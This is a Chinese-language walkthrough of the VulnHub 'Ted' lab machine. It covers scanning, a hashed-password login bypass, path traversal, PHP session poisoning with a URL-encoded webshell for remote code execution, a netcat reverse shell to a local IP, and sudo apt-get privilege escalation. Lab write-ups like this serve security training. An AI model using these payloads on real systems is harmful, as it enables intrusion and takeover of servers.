Ted靶机

信息收集：

靶机地址：https://www.vulnhub.com/entry/ted-1,327/

（1）ip扫描

nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:FF:7F:9A'

（2）端口扫描

nmap -p- -A 192.168.254.159

（3）目录扫描，没啥发现

dirb http://192.168.254.159

（4）访问页面

（5）进行弱口令登陆，登陆失败，burp抓包进行测试，发现需要使用hash加密

（6）将admin进行加密试试

加密后的值（转换大小写后）为：8C6976E5B5410415BDE908BD4DEE15DFB167A9C873FC4BB8A81F6F2AB448A918

（7）再次登录，登陆成功

admin
8C6976E5B5410415BDE908BD4DEE15DFB167A9C873FC4BB8A81F6F2AB448A918

（8）发现在搜索框处存在任意文件读取漏洞

../../../../../../../etc/passwd

（9）尝试包含用来存储用户session的文件，从而获取shell，抓取一个有session的请求包，拿到session。点击cookies的时候抓包

（10）拼接如下路径search读取：

将刚才的phpsessid值复制到sess后面
/var/lib/php/sessions/sess_9h9at5lo8mj7ujjsfn2v4qcrd4

（11）抓包将数据包放到重放模块里进行测试，发现可以修改user_pref变量的值，从而写入到session文件中，再结合文件包含漏洞，造成RCE的漏洞

getshell：

（1）写入URL编码后的一句话木马,并在搜索框处输入命令看看是否被执行，发现成功执行

%3C%3Fphp%20system(%24_POST%5B%22cmd%22%5D)%3B%20%3F%3E

（2）写入反弹shell语句

nc+192.168.254.129+4444+-e+/bin/bash

（3）反弹成功

（4）获取一个交互式的shell

python -c 'import pty;pty.spawn("/bin/bash")'

提权：

（1）sudo -l

（2）在辅助网站搜索命令

https://gtfobins.github.io/

sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

（3）提权成功